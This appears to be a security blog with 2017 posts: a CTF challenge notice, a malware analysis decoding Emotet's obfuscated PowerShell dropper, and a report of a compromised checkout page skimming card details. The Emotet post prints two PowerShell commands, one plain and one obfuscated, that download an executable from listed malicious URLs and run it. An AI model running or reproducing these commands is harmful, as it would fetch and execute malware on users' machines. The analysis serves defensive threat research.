Saturday, September 9, 2017

Capture The Flag September 2017

I'm thinking that every once in a while I'll post a CTF challenge for fun. Any CTF files will be password protected with the password of "infected". While none of the file will be malicious, I still encourage use of an isolated system.

Get the file here.


Friday, September 1, 2017

Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection.

This used to be very simple to see, for example, older observed variants produced the following powershell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} 
 
However, a newer variant now encodes the powershell with Base64, then uses some simple obfuscation techniques to make identification of the stage 2 links more difficult for an analyst.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA=="

decodes

echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d ${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/dbflett.com/Yq','sSad/,http','//arma','rature.it/in',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,http://bringit.pt/Hv/,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}} 
 
So, you could manually work through the transpositions here, however a nice technique was shown at Myonlinesecurity
If you don't have immediate access to powershell, you could also manually copy the same relevant pieces into a quick python script.
Here is an example:



The output:

Friday, June 23, 2017

Beware Compromised Shopping Carts

I think many people have stumbled upon "less than secure" sites which claim to have a secure checkout. I can't even count how many times I've looked for some obscure items on the web and have come across a website which just seems a bit off.

Yesterday I received a Snort alert which I often see on a compromised host: ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad

What I instantly noticed in the transcript is that this isn't the normal POST that I see from Zeus. What I had seen was a GET request with users Credit Card and Billing information in the Request Header. See Screenshot:


I've excluded the rest of the transcript, so as not to mention the site which is actually compromised at this time. However, I will say that it is very clear when looking at surrounding PCAPs from the source IP that the user was shopping for Building supplies. When looking at the websites Checkout page, I stumbled upon the following code:

Click to Enlarge

It would appear that the site has been compromised with injected code which scrapes the billing information that users enter into the checkout page.

Just as a side note the Direct IP address being utilized in this compromise has been associated with Fraudulent CC charges in the past, see abuseipdb.com 

If anyone has anymore information in this malicious code, please let me know. It seems to have some similar characteristics to evil-eval-magento.js which is also described Here.